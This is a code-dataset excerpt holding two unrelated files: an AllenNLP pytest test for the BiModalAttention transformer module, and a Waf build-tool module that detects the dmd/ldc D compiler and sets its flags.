| 2.703125 | 3 |
tests/modules/transformer/bimodal_attention_test.py | MSLars/allennlp | 11,433 | 12797992 | <gh_stars>1000+
import torch
import pytest
from allennlp.common import Params
from allennlp.modules.transformer import BiModalAttention
@pytest.fixture
def params_dict():
return {
"hidden_size1": 6,
"hidden_size2": 4,
"combined_hidden_size": 16,
"num_attention_heads": 2,
"dropout1": 0.1,
"dropout2": 0.2,
}
@pytest.fixture
def params(params_dict):
return Params(params_dict)
@pytest.fixture
def biattention(params):
return BiModalAttention.from_params(params.duplicate())
def test_can_construct_from_params(biattention, params_dict):
assert biattention.num_attention_heads == params_dict["num_attention_heads"]
assert biattention.attention_head_size == int(
params_dict["combined_hidden_size"] / params_dict["num_attention_heads"]
)
assert (
biattention.all_head_size
== params_dict["num_attention_heads"] * biattention.attention_head_size
)
assert biattention.query1.in_features == params_dict["hidden_size1"]
assert biattention.key1.in_features == params_dict["hidden_size1"]
assert biattention.value1.in_features == params_dict["hidden_size1"]
assert biattention.dropout1.p == params_dict["dropout1"]
assert biattention.query2.in_features == params_dict["hidden_size2"]
assert biattention.key2.in_features == params_dict["hidden_size2"]
assert biattention.value2.in_features == params_dict["hidden_size2"]
assert biattention.dropout2.p == params_dict["dropout2"]
def test_forward_runs(biattention):
biattention(
torch.randn(2, 3, 6),
torch.randn(2, 3, 4),
torch.randint(0, 2, (2, 2, 3, 3)) == 1, # creating boolean tensors
torch.randint(0, 2, (2, 2, 3, 3)) == 1,
)
| 1.851563 | 2 |
src/third_party/angle/third_party/glmark2/src/waflib/Tools/dmd.py | goochen/naiveproxy | 2,151 | 12798000 | <reponame>goochen/naiveproxy
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
conf.find_program(['dmd','dmd2','ldc'],var='D')
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find("D Compiler v")==-1:
out=conf.cmd_and_log(conf.env.D+['-version'])
if out.find("based on DMD v1.")==-1:
conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
v=conf.env
v.DFLAGS=['-d-version=Posix']
v.LINKFLAGS=[]
v.DFLAGS_dshlib=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
v=conf.env
v.D_SRC_F=['-c']
v.D_TGT_F='-of%s'
v.D_LINKER=v.D
v.DLNK_SRC_F=''
v.DLNK_TGT_F='-of%s'
v.DINC_ST='-I%s'
v.DSHLIB_MARKER=v.DSTLIB_MARKER=''
v.DSTLIB_ST=v.DSHLIB_ST='-L-l%s'
v.DSTLIBPATH_ST=v.DLIBPATH_ST='-L-L%s'
v.LINKFLAGS_dprogram=['-quiet']
v.DFLAGS_dshlib=['-fPIC']
v.LINKFLAGS_dshlib=['-L-shared']
v.DHEADER_ext='.di'
v.DFLAGS_d_with_header=['-H','-Hf']
v.D_HDR_F='%s'
def configure(conf):
conf.find_dmd()
if sys.platform=='win32':
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find('D Compiler v2.')>-1:
conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
conf.load('ar')
conf.load('d')
conf.common_flags_dmd()
conf.d_platform_flags()
if str(conf.env.D).find('ldc')>-1:
conf.common_flags_ldc()
| 1.296875 | 1 |